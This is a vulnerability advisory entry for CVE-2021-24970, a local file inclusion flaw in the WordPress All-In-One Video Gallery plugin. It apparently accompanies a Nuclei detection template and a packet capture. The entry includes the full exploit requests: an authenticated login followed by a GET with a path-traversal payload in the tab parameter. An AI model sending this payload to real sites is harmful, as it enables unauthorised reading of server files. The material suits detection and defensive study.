| Title | WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion |
|---|---|
| Author | r3Y3r53 |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Fixed in version 2.5.4. |
| CVSS Score | 7.2 |
| EPSS Score | 0.19736 |
| CVE ID | CVE-2021-24970 |
| CWE ID | CWE-22 |
| Tags | cve2021 cve wpscan wp wp-plugin wordpress lfi authenticated plugins360 vuln |
WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=wKPpFl&pwd=fyW8xI&wp-submit=Log+In
GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24970.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-24970.pcap
N/AN/A